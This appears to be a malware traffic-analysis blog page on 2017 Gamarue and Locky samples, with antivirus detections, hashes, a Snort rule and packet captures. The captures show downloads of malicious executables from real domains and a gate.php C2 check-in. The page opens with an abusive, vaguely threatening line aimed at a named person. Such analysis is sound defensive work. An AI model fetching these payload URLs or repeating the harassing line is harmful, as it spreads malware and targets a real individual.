Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

PCAP Malware Traffic Sample Download Snort Rule Win.Trojan.Gamarue variant POST /panel1/gate.php

 

51 engines detected this file
SHA-256 3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e
File name AU.EXE
File size 572.5 KB
Last analysis 2017-11-29 21:23:27 UTC

Ad-Aware

Trojan.Crypt.Agent.BF

AegisLab

Gen.Variant.Razy!c

AhnLab-V3

Trojan/Win32.Locky.C2242537

ALYac

Trojan.Crypt.Agent.BF

Antiy-AVL

Trojan/Win32.TSGeneric

Arcabit

Trojan.Crypt.Agent.BF

Avast

Win32:Malware-gen

AVG

Win32:Malware-gen

Avira

TR/Crypt.Xpack.binkq

AVware

Trojan.Win32.Generic!BT

Baidu

Win32.Trojan.WisdomEyes.16070401.9500.9999

BitDefender

Trojan.Crypt.Agent.BF

CAT-QuickHeal

TrojanSpy.SpyEyes

Comodo

Backdoor.Win32.Poison.FYRG

 

References:

https://www.hybrid-analysis.com/sample/3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e?environmentId=100

https://www.virustotal.com/#/file/3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e/detection

Snort Rule:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:“MALWARE-CNC Win.Trojan.Gamarue variant outbound connection”; flow:to_server,established; content:“POST”; http_method; content:“panel1/gate.php”; content:” HTTP/1.1|0D 0A|Cache-Control: no-cache|0D 0A|Connection|3A|”; fast_pattern:only; content:“+”; depth:15; http_client_body; metadata:impact_flag red, policy securityips drop, ruleset community, service http; sid:1234; rev:1😉

2017-11-29 19:34:59.673041 IP 192.168.1.102.50951 > 198.54.116.113.80: Flags [P.], seq 3095874245:3095874726, ack 2614075121, win 260, length 481: HTTP: GET /au.exe HTTP/1.1
E.. A.@….t…f.6tq…P..J…..P…….GET /au.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: evaroma.zone
Connection: Keep-Alive

2017-11-29 19:35:06.844873 IP 192.168.1.102.50959 > 198.54.116.113.80: Flags [P.], seq 3400751766:3400751989, ack 361817033, win 260, length 223: HTTP: POST /panel1/gate.php HTTP/1.0
E…B.@……..f.6tq…P..Z…..P…….POST /panel1/gate.php HTTP/1.0
Host: evaroma.zone
Connection: close
Content-Length: 80
Accept-Language: en-US
Content-Type: image/jpeg

UR.QQ…U..U.v#..S..Sp.Tvt#..Q..^w.U.v ..”qu’..^vvC..C..C.sC..%..U.._..WtuC..C..
2017-11-29 19:35:08.535037 IP 192.168.1.102.50960 > 198.54.116.113.80: Flags [P.], seq 85791915:85793375, ack 2118066358, win 260, length 1460: HTTP: POST /panel1/gate.php HTTP/1.0
E…B.@……..f.6tq…P….~? .P…….POST /panel1/gate.php HTTP/1.0
Host: evaroma.zone
Connection: close
Content-Length: 14075
Accept-Language: en-US
Content-Type: image/jpeg

@R.]E.VV.S
Z[Y.]v’.r#w.’..Qp.K.. w.$v.W.. q.RtsU..P..#v.Us.”v.P..U..S..K
._..Sv.’..Ts. ..X..S..UsrC..C..$..”qrC..C..#..UsqC.s%pvC..”s.U..U..Tv.U.tC..C..C.. p.U..U.KC..C.rC…e^.VX.A.T..U..T.d.SE.WE.J.U..U.K1{yC.sC..)q.U.d3be…PbK.K.U.@.N.U.KC…..VN.U.K#NbZ.^.TX’s.#wrVs._.uQ..PtrKpsV..VttS.q”..W..KwsV.v^vsK..W..R..S..^..K.sVs.W.vUt.V.:l.G.VD’s.#wrVs._.uQ..PtrKpsV..VttS.q”..W..KwsV.v^vsK..W..R..S..^..K.sVs.W.vUt.V..IB@.Av’.r#w.’..Qp.K.. w.$v.W.. q.RtsU..P..#v.Us.”v.P..U..S..K
._..Sv.’..Ts. ..X?=ZQX.Av’.r#w.’..Qp.K.. w.$v.W.. q.RtsU..P..#v.Us.”v.P..U..S..K
._..Sv.’..Ts. ..XST.]B.FDC.r.]X.^RC.r.]Zk8V.\O…#QX.?=.VA.@C.A^.U.TwT _:lSG…#P^.U.TwT _:lSCC.r.F@ ^VC.r.]Zk8V.EX
S.TwT _:lP^.U.TwT _:lQ.TwZ.\.TwT _:lVX.P[.Q[.Q\C.r.WCk8P ]P
W.TwT _:l[Z…#_V.@X.[[

Malware Trojan Downloader Dropper cubeupload.com PCAP file download traffic analysis

 

 

43 engines detected this file
SHA-256 b069e7d29889bcdcc61e7936ad4800d2563c8618135f40c50e4dbcdc9314f505
File name gfD4vo.jpg
File size 522.61 KB
Last analysis 2017-09-25 22:14:16 UTC

 

FILE 2 – Dropper

 

23 engines detected this file
SHA-256 214325a508b6354286f0ba47afdf998ea8c5b87012d6fac08ec0e7a996ac1999
File name 2602033098198832.exe
File size 266.49 KB
Last analysis 2017-09-25 22:34:21 UTC
Community score -11

 

2017-09-25 16:39:29.774994 IP 192.168.1.102.61160 > 75.75.75.75.53: 16676+ A? i.cubeupload.com. (34)
E..>…….2…fKKKK…5.*z.A$………..i
cubeupload.com…..
2017-09-25 16:39:29.812702 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [S], seq 1274466961, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….|…f..sl…PK……… ……………..
2017-09-25 16:39:29.934339 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [.], ack 217614345, win 256, length 0
E..(..@……..f..sl…PK…… P….b……..
2017-09-25 16:39:30.010343 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [P.], seq 0:489, ack 1, win 256, length 489: HTTP: GET /gfD4vo.jpg HTTP/1.1
E…..@…}….f..sl…PK…… P…….GET /gfD4vo.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: i.cubeupload.com
Connection: Keep-Alive

2017-09-25 16:39:30.748418 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
E…T+@…r….f.#.@…P..i|.\.wP…D^..GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

 

2017-09-25 16:39:30.893843 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [.], ack 1219, win 251, length 0
E..(T,@…s1…f.#.@…P..j..\.9P………….
2017-09-25 16:39:30.924425 IP 192.168.1.102.61163 > 75.75.75.75.53: 19539+ A? isrg.trustid.ocsp.identrust.com. (49)
E..M……. …fKKKK…5.9.ZLS………..isrg.trustid.ocsp identrust.com…..
2017-09-25 16:39:30.942900 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [S], seq 1854319918, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4u.@…Q5…f.#…..Pn……… . ……………
2017-09-25 16:39:31.041398 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [.], ack 2211464567, win 256, length 0
E..(u.@…Q@…f.#…..Pn../..EwP….u……..
2017-09-25 16:39:31.042271 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [P.], seq 0:247, ack 1, win 256, length 247: HTTP: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
E…u.@…PH…f.#…..Pn../..EwP…….GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com

2017-09-25 16:39:31.187180 IP 192.168.1.102.61164 > 75.75.75.75.53: 10447+ A? ocsp.int-x3.letsencrypt.org. (45)
E..I…….#…fKKKK…5.5..(…………ocsp.int-x3.letsencrypt.org…..
2017-09-25 16:39:31.277686 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [P.], seq 295:812, ack 3052, win 256, length 517
E..-..@…}x…f..sl…..(….dJP….&………..c]..c!.=.AW….cb?.c.R.a…..&..(J$.k.q>?….N!D….w#…X.z.Hy.G..0.AH..”T$~9^..t…[.2…u)”…………U…h…..{.+.d……G.Z{..I\…….8…..{..+%g..).I…O..’…+*.5N.[C>..#…0c….I.y.T~!xy*….p7..1….*
._.X#…..t.o…a…-.i…a..).G…j…zm….4..9…..6…G<s.wX….EOx.x.h.G.{…..>.#q..K…..[.y…D….X…U….K*.’+..D…4…..r=L…..fw..y$i] ..7X….]..\.!.o..<..-fXW…~2..\….&…F..B.$_…\Q.]…..`+..#.:S*..g.5*..>…V…Q{…..S.{|.O…s..6]……].h…….G..%[3..8.+.6r~C.>|.v
2017-09-25 16:39:31.393111 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 5972, win 256, length 0
E..(..@….|…f..sl…..(….o.P………….
2017-09-25 16:39:31.394922 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 8892, win 256, length 0
E..(..@….{…f..sl…..(….{.P….Q……..
2017-09-25 16:39:31.395511 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 11812, win 256, length 0
E..(..@….z…f..sl…..(……P………….
2017-09-25 16:39:31.396583 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 14732, win 256, length 0
E..(..@….y…f..sl…..(……P………….
2017-09-25 16:39:31.397200 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 17652, win 256, length 0
E..(..@….x…f..sl…..(…..RP………….
2017-09-25 16:39:31.508500 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 20572, win 256, length 0
E..(..@….w…f..sl…..(……P…|………
2017-09-25 16:39:31.509234 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 23492, win 256, length 0
E..(..@….v…f..sl…..(…..”P…qI……..

2017-09-25 16:39:48.032574 IP 192.168.1.102.61165 > 75.75.75.75.53: 52627+ A? drazalier.net. (31)
E..;…….0…fKKKK…5.’.^………… drazalier.net…..
2017-09-25 16:39:48.181862 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [S], seq 436295889, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..45.@…^….f>.e&…P..X……. ……………..
2017-09-25 16:39:48.293504 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [.], ack 3080210756, win 256, length 0
E..(5.@…_ …f>.e&…P..X…IDP………….
2017-09-25 16:39:48.300187 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [P.], seq 0:499, ack 1, win 256, length 499: HTTP: GET /PO/2602033098198832.exe HTTP/1.1
E…5.@…]….f>.e&…P..X…IDP…….GET /PO/2602033098198832.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: drazalier.net
Connection: Keep-Alive

 

Bor.uz Locky Ransomware Malware NO C2 Traffic Analysis PCAP file download

24 engines detected this file
SHA-256 8feb981439774342fbe7c7a25c21d9cbae58f4cc13feb0ebf3657a85f2142158
File name YTkjdJH7w1.exe
File size 591 KB
Last analysis 2017-09-25 15:50:03 UTC

AegisLab

Ransom.Cerber.Smaly0!c

Avast

FileRepMalware

AVG

FileRepMalware

Baidu

Win32.Trojan.WisdomEyes.16070401.9500.9999

CrowdStrike Falcon

malicious_confidence_100% (W)

Cylance

Unsafe

2017-09-25 16:50:29.002420 IP 192.168.1.102.57680 > 75.75.75.75.53: 45408+ A? bor.uz. (24)
E..4…….”…fKKKK.P.5. #..`………..bor.uz…..
2017-09-25 16:50:29.529203 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [S], seq 2670765003, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4\.@….I…f>….=.P.0…….. ……………..
2017-09-25 16:50:29.719862 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [.], ack 1966844122, win 256, length 0
E..(\.@….T…f>….=.P.0..u;..P….A……..
2017-09-25 16:50:29.731330 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [P.], seq 0:479, ack 1, win 256, length 479: HTTP: GET /YTkjdJH7w1 HTTP/1.1
E…\.@….t…f>….=.P.0..u;..P…d~..GET /YTkjdJH7w1 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bor.uz
Connection: Keep-Alive

2017-09-25 16:50:32.505137 IP 192.168.1.102.56894 > 62.209.133.18.80: Flags [P.], seq 0:268, ack 1, win 256, length 268: HTTP: GET /favicon.ico HTTP/1.1
E..4]Y@….y…f>….>.P.E..j^e’P…….GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Host: bor.uz
Connection: Keep-Alive

 

 

======================================

BINARY STRINGS

++++++++++++++++++++++++++++++++++++++

 

This program cannot be run in DOS mode.
.text
`.rdata
@.data
.rsrc
=o)A
GGWPP
Proc
essMh@)A
hVirt
hvQ3r_Q
DSDS
CreateDesktopW
IsDialogMessageW
IsCharUpperA
LoadIconA
LoadMenuW
PostMessageA
LoadStringW
LoadCursorA
DrawStateW
MessageBoxA
GetClassLongA
DispatchMessageW
GetPropA
user32.dll
LeaveCriticalSection
GetModuleHandleW
GetFileAttributesW
FindNextFileA
GetConsoleAliasW
GetCurrentThread
SearchPathW
GetStringTypeA
GetProcAddress
GetExpandedNameW
GetLogicalDriveStringsA
GetProfileSectionA
GetCurrentProcess
LoadLibraryA
WaitNamedPipeA
GetTempPathW
WaitForSingleObject
GetModuleFileNameA
IsBadReadPtr
kernel32.dll

NEW LOCKY RANSOMWARE VARIANT g46mbrrzpfszonuk.onion NO C2 PCAP file download traffic analysis

49 engines detected this file
SHA-256 ce48b278f8b823c25b222a33027248299bff3cdc2a6bdb0fdceecb0922dd790a
File name jhdsgvc74
File size 653 KB
Last analysis 2017-09-25 08:23:44 UTC
Community score -78

ESET-NOD32

Win32/Filecoder.Locky.L

F-Secure

Trojan.RanSerKD.12397146

Fortinet

W32/Locky.FWSD!tr.ransom

GData

Trojan.RanSerKD.12397146

Ikarus

Trojan.Win32.Filecoder

K7AntiVirus

Trojan ( 0051497b1 )

K7GW

Trojan ( 0051497b1 )

Kaspersky

Trojan-Ransom.Win32.Locky.ztt

2017-09-25 17:50:32.217002 IP 192.168.1.102.58790 > 75.75.75.75.53: 46557+ A? ar-inversiones.com. (36)
E..@…….:…fKKKK…5.,……………ar-inversiones.com…..
2017-09-25 17:50:32.397644 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [S], seq 2979498304, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4M5@…KU…f%.z4.’.P…@…… ……………..
2017-09-25 17:50:32.546454 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [.], ack 2169675136, win 256, length 0
E..(M6@…K`…f%.z4.’.P…A.R..P….w……..
2017-09-25 17:50:32.556435 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [P.], seq 0:490, ack 1, win 256, length 490: HTTP: GET /jhdsgvc74 HTTP/1.1
E…M7@…Iu…f%.z4.’.P…A.R..P…0C..GET /jhdsgvc74 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: ar-inversiones.com/jhdsgvc74
Connection: Keep-Alive

 

2017-09-25 17:52:34.606370 IP 192.168.1.102.50739 > 75.75.75.75.53: 28660+ A? lordmartins.com. (33)
E..=…….;…fKKKK.3.5.).-o…………lordmartins.com…..

 

2017-09-25 17:53:19.760276 IP 192.168.1.102.64353 > 75.75.75.75.53: 11634+ A? g46mbrrzpfszonuk.onion. (40)
E..D…….’…fKKKK.a.5.0..-r………..g46mbrrzpfszonuk.onion…..

NEW Locky Ransomware PCAP file download traffic analysis gokeenakte.top NO C2 Used

51 engines detected this file
SHA-256 8514a2eca4090f400a43c4af915eb3ef6e9c15dabe69716189e7c68c72cfa285
File name 1
File size 617 KB
Last analysis 2017-09-25 04:21:44 UTC
Community score -50

2017-09-25 17:31:45.176820 IP 192.168.1.102.57004 > 47.89.249.183.80: Flags [P.], seq 0:482, ack 1, win 256, length 482: HTTP: GET /url/1 HTTP/1.1
E..
p @……..f/Y…..P!Ke.`…P…….GET /url/1 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: gokeenakte.top
Connection: Keep-Alive

2017-09-25 17:33:25.458134 IP 192.168.1.102.57009 > 91.203.5.162.80: Flags [S], seq 1347326132, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4H%@….#…f[……PPN…….. .k……………
2017-09-25 17:33:31.173039 IP 192.168.1.102.57005 > 40.70.221.249.443: Flags [F.], seq 2336, ack 4383, win 258, length 0
E..(M.@……..f(F……’Q-..P..P………….
2017-09-25 17:33:31.213749 IP 192.168.1.102.57005 > 40.70.221.249.443: Flags [.], ack 4384, win 258, length 0
E..(M.@……..f(F……’Q-..P..P………….
2017-09-25 17:33:31.459273 IP 192.168.1.102.57009 > 91.203.5.162.80: Flags [S], seq 1347326132, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0H&@….&…f[……PPN……p. ………….
2017-09-25 17:33:36.338616 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 48:72, ack 49, win 32762, length 24
E..@Us@…(….f2..h…2V.kC~.0.P….7…0……#…$………..
2017-09-25 17:33:36.457114 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 73, win 32756, length 0
E..(Ut@…(….f2..h…2V.k[~.0.P…h~……..
2017-09-25 17:33:43.473893 IP 192.168.1.102.57010 > 149.154.68.190.80: Flags [S], seq 1790950938, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@N@……..f..D….Pj……… ……………..
2017-09-25 17:33:46.474293 IP 192.168.1.102.57010 > 149.154.68.190.80: Flags [S], seq 1790950938, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@O@……..f..D….Pj……… ……………..
2017-09-25 17:33:52.477158 IP 192.168.1.102.57010 > 149.154.68.190.80: Flags [S], seq 1790950938, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0@P@……..f..D….Pj…….p. ………….
2017-09-25 17:34:04.495275 IP 192.168.1.102.57011 > 91.203.5.162.80: Flags [S], seq 2489365195, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4H’@….!…f[……P.`…….. ..e…………..
2017-09-25 17:34:07.498299 IP 192.168.1.102.57011 > 91.203.5.162.80: Flags [S], seq 2489365195, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4H(@…. …f[……P.`…….. ..e…………..
2017-09-25 17:34:13.513209 IP 192.168.1.102.57011 > 91.203.5.162.80: Flags [S], seq 2489365195, win 8192, options [mss 1460,nop,nop,sackOK], length 0